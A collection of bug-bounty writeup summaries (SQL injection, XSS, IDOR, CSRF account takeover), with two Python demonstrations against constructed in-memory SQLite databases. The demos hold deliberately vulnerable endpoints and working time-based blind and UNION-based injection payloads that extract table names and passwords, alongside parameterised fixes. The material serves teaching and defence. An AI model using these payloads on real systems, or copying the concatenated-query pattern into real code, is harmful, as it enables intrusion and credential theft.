A researcher found a SQL injection vulnerability in a trading company's report-download endpoint through a hidden 'status' parameter surfaced with parameter-mining tools; because nothing from the query was reflected, it was exploited as a time-based blind SQL injection.
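The technique behind that finding, as an added example that is not code from the writeup or the affected company: a hypothetical vulnerable `download_report` endpoint concatenates the hidden `status` parameter into its query and returns only a row count, so the attacker first confirms injection by comparing a true and a false condition's response time, then recovers a value one character at a time. SQLite stands in for the real database (it has no SLEEP(), so a Python UDF named `sleep` is registered to play that role); the schema, table and column names, and the `s3cret` password are constructed for the example.

```python
import sqlite3
import time

# Constructed stand-in for the reporting database (not the company's data).
SCHEMA = """
CREATE TABLE reports (id INTEGER PRIMARY KEY, status TEXT, title TEXT);
INSERT INTO reports VALUES (1, 'ready', 'Q1 trades'), (2, 'pending', 'Q2 trades');
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
"""

DELAY = 0.05             # seconds the injected sleep() stalls the query
THRESHOLD = DELAY * 0.8  # a response slower than this counts as "slept"
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # SQLite has no SLEEP(); register a Python UDF so the engine can stall,
    # standing in for MySQL's SLEEP(n) or MSSQL's WAITFOR DELAY.
    conn.create_function("sleep", 1, lambda n: time.sleep(n) or 0)
    return conn


def download_report(conn, status):
    """Hypothetical vulnerable endpoint: the hidden 'status' parameter is
    concatenated into the query. Only a row count reaches the client, so
    nothing from the result is reflected and data must be inferred from
    timing alone."""
    sql = f"SELECT id, title FROM reports WHERE status = '{status}'"
    return len(conn.execute(sql).fetchall())


def download_report_fixed(conn, status):
    """Hardened version: a bound parameter, so the payload is just a value."""
    sql = "SELECT id, title FROM reports WHERE status = ?"
    return len(conn.execute(sql, (status,)).fetchall())


def timed(conn, status):
    """Round-trip time of one request to the vulnerable endpoint."""
    t0 = time.perf_counter()
    download_report(conn, status)
    return time.perf_counter() - t0


def sleep_if(condition):
    """Build the 'status' value: close the string literal, sleep only when
    `condition` is true, and re-balance the trailing quote."""
    return (f"x' OR (SELECT CASE WHEN {condition} THEN sleep({DELAY}) "
            f"ELSE 0 END) AND '1'='1")


def confirm_injection(conn):
    """A true condition must be measurably slower than a false one;
    otherwise the parameter is not injectable this way."""
    slow = timed(conn, sleep_if("1=1"))
    fast = timed(conn, sleep_if("1=2"))
    return slow >= THRESHOLD and fast < THRESHOLD


def extract_blind(conn, subquery, max_len=32):
    """Recover the scalar result of `subquery` one character at a time using
    only response time: a correct guess makes the database sleep."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            cond = f"substr(({subquery}), {pos}, 1) = '{ch}'"
            if timed(conn, sleep_if(cond)) >= THRESHOLD:
                out += ch
                break
        else:
            break  # no character matched: end of the string reached
    return out


if __name__ == "__main__":
    db = make_db()
    print("injectable:", confirm_injection(db))
    print("admin password:",
          extract_blind(db, "SELECT password FROM users WHERE name = 'admin'"))
    print("fixed endpoint rows for payload:",
          download_report_fixed(db, sleep_if("1=1")))
```

The threshold is deliberately below the injected delay so network jitter does not produce false negatives; on a real target the same loop is run against the HTTP endpoint, and a real engagement would use a binary search over the character range rather than a linear scan to cut the request count.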
Writeup of three bugs submitted to Google VRP: a reflected XSS in artsexperiments.withgoogle.com discovered via ParamSpider and kxss automation, and two IDORs in AppSheet endpoints where access control could be bypassed—one requiring a specific version parameter to exploit. The author details the discovery process, initial rejections, and eventual acceptance with $500 bounties awarded.
A researcher discovered a full account takeover vulnerability by chaining a missing CSRF token validation on the password change endpoint with a hidden 'uid' parameter discovered via Param Miner, allowing the password of any user to be changed without authentication; the report earned a $1000 bounty.
A bug bounty hunter discovered a union-based SQL injection vulnerability in a private company's web application by identifying vulnerable parameters and methodically determining the number of columns (11) before extracting database version, user information, table schemas, and column names using UNION SELECT queries and information_schema enumeration.
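The methodology in that last writeup, as an added example rather than the hunter's own code: a hypothetical `search` endpoint splices its filter into a three-column SELECT (the writeup's target had eleven; the procedure is the same for any count). The column count is found with `ORDER BY n` and cross-checked with `UNION SELECT NULL, ...`, and then the UNION is used to pull the version string, table list, column list and finally row data. SQLite stands in for the real database, so `sqlite_version()`, `sqlite_master` and `pragma_table_info()` play the roles that `@@version`, `information_schema.tables` and `information_schema.columns` played in the writeup; the schema and credentials are constructed for the example.

```python
import sqlite3

# Constructed sample schema standing in for the target application's database.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, category TEXT);
INSERT INTO products VALUES (1, 'widget', 9.99, 'tools'), (2, 'gizmo', 19.5, 'tools');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'bob', 'letmein');
"""
REAL_VERSION = sqlite3.sqlite_version  # ground truth to compare the leak against


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search(conn, category):
    """Hypothetical vulnerable endpoint: the category filter is spliced into
    a three-column SELECT and every result row is rendered to the client."""
    sql = f"SELECT id, name, price FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, category):
    """Hardened version: bound parameter, the payload becomes a literal value."""
    sql = "SELECT id, name, price FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def count_columns_order_by(conn, max_cols=30):
    """ORDER BY n succeeds while n <= column count and errors past it."""
    for n in range(1, max_cols + 1):
        try:
            search(conn, f"x' ORDER BY {n}-- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


def count_columns_union(conn, max_cols=30):
    """Cross-check: UNION SELECT NULL, ... only parses when the counts match."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            search(conn, f"x' UNION SELECT {nulls}-- ")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_leak(conn, select_body):
    """Run `SELECT <select_body>` through the UNION. 'x' matches no real
    category, so only the injected rows come back; plain UNION also sorts
    and dedups them, so callers should not rely on declaration order."""
    return search(conn, f"x' UNION SELECT {select_body}-- ")


def db_version(conn):
    # sqlite_version() is SQLite's equivalent of MySQL's @@version
    return union_leak(conn, "sqlite_version(), NULL, NULL")[0][0]


def list_tables(conn):
    # sqlite_master plays the role of information_schema.tables
    rows = union_leak(conn, "name, NULL, NULL FROM sqlite_master WHERE type = 'table'")
    return [r[0] for r in rows]


def list_columns(conn, table):
    # pragma_table_info() plays the role of information_schema.columns
    rows = union_leak(conn, f"name, type, NULL FROM pragma_table_info('{table}')")
    return [r[0] for r in rows]


def dump_users(conn):
    rows = union_leak(conn, "username, password, NULL FROM users")
    return [(u, p) for u, p, _ in rows]


if __name__ == "__main__":
    db = make_db()
    print("columns:", count_columns_order_by(db), count_columns_union(db))
    print("version:", db_version(db))
    print("tables:", list_tables(db))
    print("users columns:", list_columns(db, "users"))
    print("users:", dump_users(db))
    print("fixed endpoint:", search_fixed(db, "x' UNION SELECT username, password, NULL FROM users-- "))
```

The NULL padding matters because the UNION must match both the column count and a type each column can hold; NULL is accepted everywhere, so it is the safe filler while the one column that renders is used to carry the data out.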